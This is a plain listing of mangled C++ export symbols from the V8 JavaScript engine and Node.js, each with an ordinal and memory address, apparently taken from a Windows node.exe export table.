                                  ?Cvttss2si@TurboAssembler@internal@v8@@QEAAXVRegister@23@VXMMRegister@23@@Z42470x140499b00
                                  ?Cvttss2siq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@@Z42480x140499b50
                                  ?Cvttss2siq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VXMMRegister@23@@Z42490x140499bc0
                                  ?Cvttss2uiq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@PEAVLabel@23@@Z42500x140499c10
                                  ?Cvttss2uiq@TurboAssembler@internal@v8@@QEAAXVRegister@23@VXMMRegister@23@PEAVLabel@23@@Z42510x140499c40
                                  ?DFSPop@ControlEquivalence@compiler@internal@v8@@AEAAXAEAV?$ZoneStack@UDFSStackEntry@ControlEquivalence@compiler@internal@v8@@@34@PEAVNode@234@@Z42520x140ff84f0
                                  ?DFSPush@ControlEquivalence@compiler@internal@v8@@AEAAXAEAV?$ZoneStack@UDFSStackEntry@ControlEquivalence@compiler@internal@v8@@@34@PEAVNode@234@1W4DFSDirection@1234@@Z42530x140ff85b0
                                  ?DOM@ReasonEnum@Paused@API@Debugger@protocol@v8_inspector@@3PEBDEB42540x141cdcc48
                                  ?Data@BackingStore@v8@@QEBAPEAXXZ42550x1400769d0
                                  ?Data@Buffer@node@@YAPEADV?$Local@VObject@v8@@@v8@@@Z42560x1401dad30
                                  ?Data@Buffer@node@@YAPEADV?$Local@VValue@v8@@@v8@@@Z42570x1401dad40
                                  ?Data@Contents@ArrayBuffer@v8@@QEBAPEAXXZ42580x1400769d0
                                  ?Data@Contents@SharedArrayBuffer@v8@@QEBAPEAXXZ42590x1400769d0
                                  ?DataAlign@Assembler@internal@v8@@QEAAXH@Z42600x1409faf50
                                  ?DataConstant@Descriptor@internal@v8@@SA?AV123@PEAVIsolate@23@V?$Handle@VName@internal@v8@@@23@HV?$Handle@VObject@internal@v8@@@23@W4PropertyAttributes@23@@Z42610x14075a180
                                  ?DataConstant@Descriptor@internal@v8@@SA?AV123@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@W4PropertyAttributes@23@@Z42620x14075a230
                                  ?DataField@Descriptor@internal@v8@@SA?AV123@PEAVIsolate@23@V?$Handle@VName@internal@v8@@@23@HW4PropertyAttributes@23@VRepresentation@23@@Z42630x14075a2e0
                                  ?DataField@Descriptor@internal@v8@@SA?AV123@V?$Handle@VName@internal@v8@@@23@HW4PropertyAttributes@23@W4PropertyConstness@23@VRepresentation@23@AEBVMaybeObjectHandle@23@@Z42640x14075a350
                                  ?DateNow@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ42650x140ebe4f0
                                  ?DateTimeConfigurationChangeNotification@Isolate@v8@@QEAAXW4TimeZoneDetection@12@@Z42660x140a81320
                                  ?Date_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ42670x1404221e0
                                  ?Date_string@OffThreadFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ42680x140727680
                                  ?DaylightSavingsOffsetInMs@DateCache@internal@v8@@AEAAH_J@Z42690x1409d3180
                                  ?DaysFromTime@DateCache@internal@v8@@SAH_J@Z42700x140676660
                                  ?DaysFromYearMonth@DateCache@internal@v8@@QEAAHHH@Z42710x1409d3750
                                  ?Deactivate@IncrementalMarking@internal@v8@@QEAAXXZ42720x140920b60
                                  ?DeactivateIncrementalWriteBarrier@IncrementalMarking@internal@v8@@AEAAXXZ42730x140920b70
                                  ?DeactivateIncrementalWriteBarrierForSpace@IncrementalMarking@internal@v8@@AEAAXPEAVNewSpace@23@@Z42740x140920ce0
                                  ?DeactivateIncrementalWriteBarrierForSpace@IncrementalMarking@internal@v8@@AEAAXPEAVPagedSpace@23@@Z42750x140920d10
                                  ?Dead@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ42760x1400769d0
                                  ?Dead@MachineGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ42770x140e35a20
                                  ?DeadValue@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4MachineRepresentation@34@@Z42780x140e09980
                                  ?DeadValue@DeadCodeElimination@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@@Z42790x140f15410
                                  ?DebugBreak@CodeAssembler@compiler@internal@v8@@QEAAXXZ42800x140e6bb40
                                  ?DebugBreak@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@XZ42810x140ec4180
                                  ?DebugBreak@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ42820x140e0ecd0
                                  ?DebugBreak@OS@base@v8@@SAXXZ42830x140dc0770
                                  ?DebugBreak@RawMachineAssembler@compiler@internal@v8@@QEAAXXZ42840x140ee2070
                                  ?DebugBreak@TurboAssembler@internal@v8@@UEAAXXZ42850x140499c50
                                  ?DebugCommand@ReasonEnum@Paused@API@Debugger@protocol@v8_inspector@@3PEBDEB42860x141cdcc40
                                  ?DebugEvaluate@wasm@internal@v8@@YA?AV?$MaybeHandle@VString@internal@v8@@@23@V?$Vector@$$CBE@23@V?$Handle@VWasmInstanceObject@internal@v8@@@23@PEAVStandardFrame@23@@Z42870x140569d60
                                  ?DebugName@CallInterfaceDescriptor@internal@v8@@QEBAPEBDXZ42880x1409dd350
                                  ?Debugger@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@XZ42890x140893a70
                                  ?Debugger@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ42900x140ead660
                                  ?DecRef@WasmCode@wasm@internal@v8@@QEAA_NXZ42910x1404221f0
                                  ?DecRefOnDeadCode@WasmCode@wasm@internal@v8@@QEAA_NXZ42920x140422210
                                  ?DecRefOnPotentiallyDeadCode@WasmCode@wasm@internal@v8@@AEAA_NXZ42930x14056f330
                                  ?Declare@Parser@internal@v8@@AEAAXPEAVDeclaration@23@PEBVAstRawString@23@W4VariableKind@23@W4VariableMode@23@W4InitializationFlag@23@PEAVScope@23@PEA_NHH@Z42940x14072c310
                                  ?Declare@Scope@internal@v8@@AEAAPEAVVariable@23@PEAVZone@23@PEBVAstRawString@23@W4VariableMode@23@W4VariableKind@23@W4InitializationFlag@23@W4MaybeAssignedFlag@23@PEA_N@Z42950x140641140
                                  ?DeclareAndBindVariable@Parser@internal@v8@@AEAAXPEAVVariableProxy@23@W4VariableKind@23@W4VariableMode@23@PEAVScope@23@PEA_NH@Z42960x14072c400
                                  ?DeclareArguments@DeclarationScope@internal@v8@@QEAAXPEAVAstValueFactory@23@@Z42970x140a53bc0
                                  ?DeclareArrowFunctionFormalParameters@Parser@internal@v8@@AEAAXPEAUParserFormalParameters@23@PEAVExpression@23@AEBULocation@Scanner@23@@Z42980x14072c480
                                  ?DeclareBoundVariable@Parser@internal@v8@@AEAAPEAVVariableProxy@23@PEBVAstRawString@23@W4VariableMode@23@H@Z42990x14072c5d0
                                  ?DeclareBrandVariable@ClassScope@internal@v8@@QEAAPEAVVariable@23@PEAVAstValueFactory@23@W4IsStaticFlag@23@H@Z43000x140a53c50
                                  ?DeclareCatchVariableName@Parser@internal@v8@@AEAAPEAVVariable@23@PEAVScope@23@PEBVAstRawString@23@@Z43010x1406fa530
                                  ?DeclareCatchVariableName@Scope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@@Z43020x140a53d80
                                  ?DeclareClass@Parser@internal@v8@@AEAAPEAVStatement@23@PEBVAstRawString@23@PEAVExpression@23@PEAV?$ZoneList@PEBVAstRawString@internal@v8@@@23@HH@Z43030x14072c6c0
                                  ?DeclareClassVariable@ClassScope@internal@v8@@QEAAPEAVVariable@23@PEAVAstValueFactory@23@PEBVAstRawString@23@H@Z43040x140a53de0
                                  ?DeclareClassVariable@Parser@internal@v8@@AEAAXPEAVClassScope@23@PEBVAstRawString@23@PEAUClassInfo@?$ParserBase@VParser@internal@v8@@@23@H@Z43050x14072c7f0
                                  ?DeclareDefaultFunctionVariables@DeclarationScope@internal@v8@@QEAAXPEAVAstValueFactory@23@@Z43060x140a53e70
                                  ?DeclareDynamicGlobal@DeclarationScope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@W4VariableKind@23@PEAVScope@23@@Z43070x140a53fd0
                                  ?DeclareFormalParameters@Parser@internal@v8@@AEAAXPEAUParserFormalParameters@23@@Z43080x1406fa540
                                  ?DeclareFunction@Parser@internal@v8@@AEAAPEAVStatement@23@PEBVAstRawString@23@PEAVFunctionLiteral@23@W4VariableMode@23@W4VariableKind@23@HHPEAV?$ZoneList@PEBVAstRawString@internal@v8@@@23@@Z43090x14072c890
                                  ?DeclareFunctionNameVar@Parser@internal@v8@@AEAAXPEBVAstRawString@23@W4FunctionSyntaxKind@23@PEAVDeclarationScope@23@@Z43100x14072ca80
                                  ?DeclareFunctionVar@DeclarationScope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@PEAVScope@23@@Z43110x140a54020
                                  ?DeclareGeneratorObjectVar@DeclarationScope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@@Z43120x140a541d0
                                  ?DeclareIdentifier@Parser@internal@v8@@AEAAXPEBVAstRawString@23@H@Z43130x1406fa640
                                  ?DeclareLabel@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXPEAPEAV?$ZoneList@PEBVAstRawString@internal@v8@@@23@0PEBVAstRawString@23@@Z43140x1406fa650
                                  ?DeclareLocal@Scope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@W4VariableMode@23@W4VariableKind@23@PEA_NW4InitializationFlag@23@@Z43150x140a54260
                                  ?DeclareNative@Parser@internal@v8@@AEAAPEAVStatement@23@PEBVAstRawString@23@H@Z43160x14072cac0
                                  ?DeclareParameter@DeclarationScope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@W4VariableMode@23@_N2PEAVAstValueFactory@23@H@Z43170x140a54310
                                  ?DeclarePrivateClassMember@Parser@internal@v8@@AEAAXPEAVClassScope@23@PEBVAstRawString@23@PEAVClassLiteralProperty@23@W4Kind@623@_NPEAUClassInfo@?$ParserBase@VParser@internal@v8@@@23@@Z43180x14072cc10
                                  ?DeclarePrivateName@ClassScope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@W4VariableMode@23@W4IsStaticFlag@23@PEA_N@Z43190x140a544a0
                                  ?DeclarePublicClassField@Parser@internal@v8@@AEAAXPEAVClassScope@23@PEAVClassLiteralProperty@23@_N2PEAUClassInfo@?$ParserBase@VParser@internal@v8@@@23@@Z43200x14072cd00
                                  ?DeclarePublicClassMethod@Parser@internal@v8@@AEAAXPEBVAstRawString@23@PEAVClassLiteralProperty@23@_NPEAUClassInfo@?$ParserBase@VParser@internal@v8@@@23@@Z43210x14072cdb0
                                  ?DeclareSloppyBlockFunction@DeclarationScope@internal@v8@@QEAAXPEAVSloppyBlockFunctionStatement@23@@Z43220x140a54620
                                  ?DeclareThis@DeclarationScope@internal@v8@@QEAAXPEAVAstValueFactory@23@@Z43230x140a54640
                                  ?DeclareUnboundVariable@Parser@internal@v8@@AEAAXPEBVAstRawString@23@W4VariableMode@23@W4InitializationFlag@23@H@Z43240x14072ce30
                                  ?DeclareVariable@Parser@internal@v8@@AEAAPEAVVariable@23@PEBVAstRawString@23@W4VariableKind@23@W4VariableMode@23@W4InitializationFlag@23@PEAVScope@23@PEA_NHH@Z43250x14072ce80
                                  ?DeclareVariable@Scope@internal@v8@@QEAAPEAVVariable@23@PEAVDeclaration@23@PEBVAstRawString@23@HW4VariableMode@23@W4VariableKind@23@W4InitializationFlag@23@PEA_N55@Z43260x140a54700
                                  ?DeclareVariableName@Scope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@W4VariableMode@23@PEA_NW4VariableKind@23@@Z43270x140a548a0
                                  ?Decode@BytecodeDecoder@interpreter@internal@v8@@SAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV56@PEBEH@Z43280x140886a50
                                  ?Decode@Disassembler@internal@v8@@SAHPEAVIsolate@23@PEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@PEAE2VCodeReference@23@_K@Z43290x1409a6cb0
                                  ?DecodeBytes@node@@YA_JPEAVIsolate@v8@@V?$Local@VValue@v8@@@3@W4encoding@1@@Z43300x14024b060
                                  ?DecodeCustomSections@wasm@internal@v8@@YA?AV?$vector@UCustomSectionOffset@wasm@internal@v8@@V?$allocator@UCustomSectionOffset@wasm@internal@v8@@@std@@@std@@PEBE0@Z43310x140583900
                                  ?DecodeLocalDecls@wasm@internal@v8@@YA_NAEBVWasmFeatures@123@PEAUBodyLocalDecls@123@PEBE2@Z43320x1405b7c30
                                  ?DecodeMapping@WasmModuleSourceMap@wasm@internal@v8@@AEAA_NAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z43330x14052a730
                                  ?DecodeRegisterListOperand@BytecodeDecoder@interpreter@internal@v8@@SA?AVRegisterList@234@_KIW4OperandType@234@W4OperandScale@234@@Z43340x140887bf0
                                  ?DecodeRegisterOperand@BytecodeDecoder@interpreter@internal@v8@@SA?AVRegister@234@_KW4OperandType@234@W4OperandScale@234@@Z43350x140887c70
                                  ?DecodeReservation@DeserializerAllocator@internal@v8@@QEAAXAEBV?$vector@VReservation@SerializedData@internal@v8@@V?$allocator@VReservation@SerializedData@internal@v8@@@std@@@std@@@Z43360x14060fa20
                                  ?DecodeSLeb128@EhFrameIterator@internal@v8@@CAHPEBEPEAH@Z43370x1409a5110
                                  ?DecodeSignedOperand@BytecodeDecoder@interpreter@internal@v8@@SAH_KW4OperandType@234@W4OperandScale@234@@Z43380x140887d10
                                  ?DecodeULeb128@EhFrameIterator@internal@v8@@CAIPEBEPEAH@Z43390x1409a5170
                                  ?DecodeUnsignedOperand@BytecodeDecoder@interpreter@internal@v8@@SAI_KW4OperandType@234@W4OperandScale@234@@Z43400x140887d70
                                  ?DecodeWasmFunctionForTesting@wasm@internal@v8@@YA?AV?$Result@V?$unique_ptr@UWasmFunction@wasm@internal@v8@@U?$default_delete@UWasmFunction@wasm@internal@v8@@@std@@@std@@@123@AEBVWasmFeatures@123@PEAVZone@23@AEBUModuleWireBytes@123@PEBUWasmModule@123@PEBE4PEAVCounters@23@@Z43410x140589380
                                  ?DecodeWasmInitExprForTesting@wasm@internal@v8@@YA?AUWasmInitExpr@123@AEBVWasmFeatures@123@PEBE1@Z43420x140589650
                                  ?DecodeWasmModule@wasm@internal@v8@@YA?AV?$Result@V?$shared_ptr@UWasmModule@wasm@internal@v8@@@std@@@123@AEBVWasmFeatures@123@PEBE1_NW4ModuleOrigin@123@PEAVCounters@23@PEAVAccountingAllocator@23@@Z43430x140589760
                                  ?DecodeWasmSignatureForTesting@wasm@internal@v8@@YAPEBV?$Signature@VValueType@wasm@internal@v8@@@23@AEBVWasmFeatures@123@PEAVZone@23@PEBE2@Z43440x140589a50
                                  ?DecodeWrite@node@@YA_JPEAVIsolate@v8@@PEAD_KV?$Local@VValue@v8@@@3@W4encoding@1@@Z43450x14024b0d0
                                  ?Decommit@WasmCodeManager@wasm@internal@v8@@AEAAXVAddressRegion@base@4@@Z43460x14056f370
                                  ?Decompress@SnapshotCompression@internal@v8@@SA?AVSnapshotData@23@V?$Vector@$$CBE@23@@Z43470x1406034f0
                                  ?DecompressAnyTagged@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@@Z43480x140499c60
                                  ?DecompressTaggedPointer@TurboAssembler@internal@v8@@QEAAXVRegister@23@0@Z43490x140499d70
                                  ?DecompressTaggedPointer@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@@Z43500x140499e70
                                  ?DecompressTaggedSigned@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@@Z43510x140499f80
                                  ?Decorate@Graph@compiler@internal@v8@@QEAAXPEAVNode@234@@Z43520x140ea5920
                                  ?DecreaseAllocatedBytes@PagedSpace@internal@v8@@QEAAX_KPEAVPage@23@@Z43530x140422230
                                  ?DecreaseAllocatedSize@EmbedderHeapTracer@v8@@QEAAX_K@Z43540x140a81410
                                  ?DecreaseAllocatedSize@LocalEmbedderHeapTracer@internal@v8@@QEAAX_K@Z43550x1408cbad0
                                  ?DecreaseCapacity@PagedSpace@internal@v8@@QEAAX_K@Z43560x140422240
                                  ?DecreaseLimit@PagedSpace@internal@v8@@AEAAX_K@Z43570x1408d2340
                                  ?Decrement@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ43580x140e0a680
                                  ?Decrement@StatsCounterThreadSafe@internal@v8@@QEAAXH@Z43590x1408555b0
                                  ?Decrement@StatsCounterThreadSafe@internal@v8@@QEAAXXZ43600x140855600
                                  ?DecrementCounter@MacroAssembler@internal@v8@@QEAAXPEAVStatsCounter@23@H@Z43610x14049a070
                                  ?DecrementExternalBackingStoreBytes@Space@internal@v8@@QEAAXW4ExternalBackingStoreType@23@_K@Z43620x14041ada0
                                  ?DecrementMicrotasksScopeDepth@MicrotaskQueue@internal@v8@@QEAAXXZ43630x140610210
                                  ?DecrementMicrotasksSuppressions@MicrotaskQueue@internal@v8@@QEAAXXZ43640x140610220
                                  ?DecrementRefCount@WasmCode@wasm@internal@v8@@SAXV?$Vector@QEAVWasmCode@wasm@internal@v8@@@34@@Z43650x14056f3d0
                                  ?DecrementTracingIndentation@JSHeapBroker@compiler@internal@v8@@QEAAXXZ43660x140ddb4d0
                                  ?DecrementUnscheduledUseCount@Scheduler@compiler@internal@v8@@AEAAXPEAVNode@234@H0@Z43670x140fb7c20
                                  ?Default@AssemblerOptions@internal@v8@@SA?AU123@PEAVIsolate@23@@Z43680x1409faf90
                                  ?Default@MeasureMemoryDelegate@v8@@SA?AV?$unique_ptr@VMeasureMemoryDelegate@v8@@U?$default_delete@VMeasureMemoryDelegate@v8@@@std@@@std@@PEAVIsolate@2@V?$Local@VContext@v8@@@2@V?$Local@VResolver@Promise@v8@@@2@W4MeasureMemoryMode@2@@Z43690x140a81430
                                  ?Default@RegisterConfiguration@internal@v8@@SAPEBV123@XZ43700x1409db800
                                  ?DefaultAt@SwitchBuilder@interpreter@internal@v8@@QEAAXH@Z43710x14086cb80
                                  ?DefaultConstructor@Parser@internal@v8@@AEAAPEAVFunctionLiteral@23@PEBVAstRawString@23@_NHH@Z43720x14072cf90
                                  ?DefaultInitializePlatformSpecific@CallInterfaceDescriptor@internal@v8@@KAXPEAVCallInterfaceDescriptorData@23@H@Z43730x14049fa80
                                  ?DefaultLowering@Int64Lowering@compiler@internal@v8@@AEAA_NPEAVNode@234@_N@Z43740x140ed2d60
                                  ?DefaultProcessExitHandler@node@@YAXPEAVEnvironment@1@H@Z43750x140249290
                                  ?DefaultRepresentation@InstructionSequence@compiler@internal@v8@@SA?AW4MachineRepresentation@34@XZ43760x1404537c0
                                  ?DefaultSchedulerData@Scheduler@compiler@internal@v8@@AEAA?AUSchedulerData@1234@XZ43770x140fb7dd0
                                  ?DefineAccessor@JSObject@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@V?$Handle@VJSObject@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@2W4PropertyAttributes@23@@Z43780x1407b2740
                                  ?DefineDeoptimizationLiteral@CodeGenerator@compiler@internal@v8@@AEAAHVDeoptimizationLiteral@234@@Z43790x140e4a4a0
                                  ?DefineOwnProperty@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@V?$Local@VValue@v8@@@2@W4PropertyAttribute@2@@Z43800x140a814f0
                                  ?DefineProperty@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@AEAVPropertyDescriptor@2@@Z43810x140a818d0
                                  ?DefinePropertyOrElementIgnoreAttributes@JSObject@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@V?$Handle@VJSObject@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@W4PropertyAttributes@23@@Z43820x1407b3720
                                  ?Deinit@Isolate@internal@v8@@AEAAXXZ43830x14097cec0
                                  ?DelayedStringConstant@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@PEBVStringConstantBase@34@@Z43840x140e09a20
                                  ?Delete@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@SA_NPEAVIsolate@23@VOrderedHashMap@23@VObject@23@@Z43850x14075e2f0
                                  ?Delete@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@SA_NPEAVIsolate@23@VOrderedHashSet@23@VObject@23@@Z43860x14075e450
                                  ?Delete@?$OrderedHashTableHandler@VSmallOrderedHashMap@internal@v8@@VOrderedHashMap@23@@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z43870x14075e580
                                  ?Delete@?$OrderedHashTableHandler@VSmallOrderedHashSet@internal@v8@@VOrderedHashSet@23@@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z43880x14075e5b0
                                  ?Delete@?$OrderedHashTableHandler@VSmallOrderedNameDictionary@internal@v8@@VOrderedNameDictionary@23@@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z43890x14075e5e0
                                  ?Delete@?$SmallOrderedHashTable@VSmallOrderedHashMap@internal@v8@@@internal@v8@@SA_NPEAVIsolate@23@VSmallOrderedHashMap@23@VObject@23@@Z43900x14075e770
                                  ?Delete@?$SmallOrderedHashTable@VSmallOrderedHashSet@internal@v8@@@internal@v8@@SA_NPEAVIsolate@23@VSmallOrderedHashSet@23@VObject@23@@Z43910x14075e890
                                  ?Delete@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@W4LanguageMode@34@@Z43920x140893b70
                                  ?Delete@CpuProfile@v8@@QEAAXXZ43930x140a81b40
                                  ?Delete@HeapSnapshot@v8@@QEAAXXZ43940x140a81b50
                                  ?Delete@Isolate@internal@v8@@SAXPEAV123@@Z43950x14097d2d0
                                  ?Delete@LookupIterator@internal@v8@@QEAAXXZ43960x14079c560
                                  ?Delete@Map@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z43970x140a81bc0
                                  ?Delete@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@I@Z43980x140a81e90
                                  ?Delete@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z43990x140a820f0
                                  ?Delete@Set@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z44000x140a82560
                                  ?Delete@SmallOrderedHashMap@internal@v8@@SA_NPEAVIsolate@23@V123@VObject@23@@Z44010x14075eaf0
                                  ?Delete@SmallOrderedHashSet@internal@v8@@SA_NPEAVIsolate@23@V123@VObject@23@@Z44020x14075eb00
                                  ?DeleteAll@Zone@internal@v8@@AEAAXXZ44030x140515080
                                  ?DeleteAllHeapSnapshots@HeapProfiler@v8@@QEAAXXZ44040x140a82830
                                  ?DeleteAllProfiles@CpuProfiler@internal@v8@@QEAAXXZ44050x1406e7870
                                  ?DeleteCodeAfter@WasmFunctionBuilder@wasm@internal@v8@@QEAAX_K@Z44060x14052f400
                                  ?DeleteCodeEntry@CodeMap@internal@v8@@AEAAXI@Z44070x1406d5480
                                  ?DeleteCompileJobsOnContext@WasmEngine@wasm@internal@v8@@QEAAXV?$Handle@VContext@internal@v8@@@34@@Z44080x14055e170
                                  ?DeleteCompileJobsOnIsolate@WasmEngine@wasm@internal@v8@@QEAAXPEAVIsolate@34@@Z44090x14055e3e0
                                  ?DeleteEntry@?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@23@PEAVIsolate@23@V423@VInternalIndex@23@@Z44100x140773b10
                                  ?DeleteEntry@?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@23@PEAVIsolate@23@V423@VInternalIndex@23@@Z44110x140773b90
                                  ?DeleteEntry@?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNumberDictionary@internal@v8@@@23@PEAVIsolate@23@V423@VInternalIndex@23@@Z44120x140773c10
                                  ?DeleteEntry@?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@23@PEAVIsolate@23@V423@VInternalIndex@23@@Z44130x140773c90
                                  ?DeleteEntry@IdentityMapBase@internal@v8@@IEAA_N_KPEAPEAX@Z44140x1405f3040
                                  ?DeleteEntry@OrderedNameDictionary@internal@v8@@SA?AV?$Handle@VOrderedNameDictionary@internal@v8@@@23@PEAVIsolate@23@V423@H@Z44150x14075eb10
                                  ?DeleteEntry@OrderedNameDictionaryHandler@internal@v8@@SA?AV?$Handle@VHeapObject@internal@v8@@@23@PEAVIsolate@23@V423@H@Z44160x14075ecb0
                                  ?DeleteEntry@SmallOrderedNameDictionary@internal@v8@@SA?AV?$Handle@VSmallOrderedNameDictionary@internal@v8@@@23@PEAVIsolate@23@V423@H@Z44170x14075ed00
                                  ?DeleteExtensions@HandleScope@internal@v8@@SAXPEAVIsolate@23@@Z44180x140963f20
                                  ?DeleteIndex@IdentityMapBase@internal@v8@@AEAA_NHPEAPEAX@Z44190x1405f30e0
                                  ?DeletePrivate@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VPrivate@v8@@@2@@Z44200x140a82840
                                  ?DeleteProfile@CpuProfiler@internal@v8@@QEAAXPEAVCpuProfile@23@@Z44210x1406e78a0
                                  ?DeleteProperty@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ44220x140ead670
                                  ?DeleteProperty@JSReceiver@internal@v8@@SA?AV?$Maybe@_N@3@V?$Handle@VJSReceiver@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@W4LanguageMode@23@@Z44230x1407b4170
                                  ?DeletePropertyOrElement@JSReceiver@internal@v8@@SA?AV?$Maybe@_N@3@V?$Handle@VJSReceiver@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@W4LanguageMode@23@@Z44240x1407b41f0
                                  ?DeleteThreadLocalKey@Thread@base@v8@@SAXH@Z44250x140dc0780
                                  ?DeleteUnresolved@Scope@internal@v8@@QEAAXPEAVVariableProxy@23@@Z44260x140a54960
                                  ?Deleter@Contents@ArrayBuffer@v8@@QEBAP6AXPEAX_K0@ZXZ44270x140076c60
                                  ?Deleter@Contents@SharedArrayBuffer@v8@@QEBAP6AXPEAX_K0@ZXZ44280x140076c60
                                  ?DeleterData@Contents@ArrayBuffer@v8@@QEBAPEAXXZ44290x140076c70
                                  ?DeleterData@Contents@SharedArrayBuffer@v8@@QEBAPEAXXZ44300x140076c70
                                  ?Deoptimize@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4DeoptimizeKind@34@W4DeoptimizeReason@34@AEBUFeedbackSource@234@@Z44310x140e09ac0
                                  ?DeoptimizeAll@Deoptimizer@internal@v8@@SAXPEAVIsolate@23@@Z44320x1409ade80
                                  ?DeoptimizeFunction@Debug@internal@v8@@QEAAXV?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z44330x1409bf790
                                  ?DeoptimizeIf@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4DeoptimizeKind@34@W4DeoptimizeReason@34@AEBUFeedbackSource@234@W4IsSafetyCheck@234@@Z44340x140e09c30
                                  ?DeoptimizeIf@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@W4DeoptimizeReason@34@AEBUFeedbackSource@234@PEAV5234@2W4IsSafetyCheck@234@@Z44350x140ec4230
                                  ?DeoptimizeIfNot@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@W4DeoptimizeReason@34@AEBUFeedbackSource@234@PEAV5234@2W4IsSafetyCheck@234@@Z44360x140ec4310
                                  ?DeoptimizeReasonToString@internal@v8@@YAPEBDW4DeoptimizeReason@12@@Z44370x1409b7950
                                  ?DeoptimizeUnless@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4DeoptimizeKind@34@W4DeoptimizeReason@34@AEBUFeedbackSource@234@W4IsSafetyCheck@234@@Z44380x140e09e70
                                  ?DependOnArrayBufferDetachingProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NXZ44390x140f0ea00
                                  ?DependOnArrayIteratorProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NXZ44400x140f0ea60
                                  ?DependOnArraySpeciesProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NXZ44410x140f0eac0
                                  ?DependOnElementsKind@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVAllocationSiteRef@234@@Z44420x140f0eb20
                                  ?DependOnElementsKinds@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVAllocationSiteRef@234@@Z44430x140f0ec20
                                  ?DependOnFieldConstness@CompilationDependencies@compiler@internal@v8@@QEAA?AW4PropertyConstness@34@AEBVMapRef@234@VInternalIndex@34@@Z44440x140f0eda0
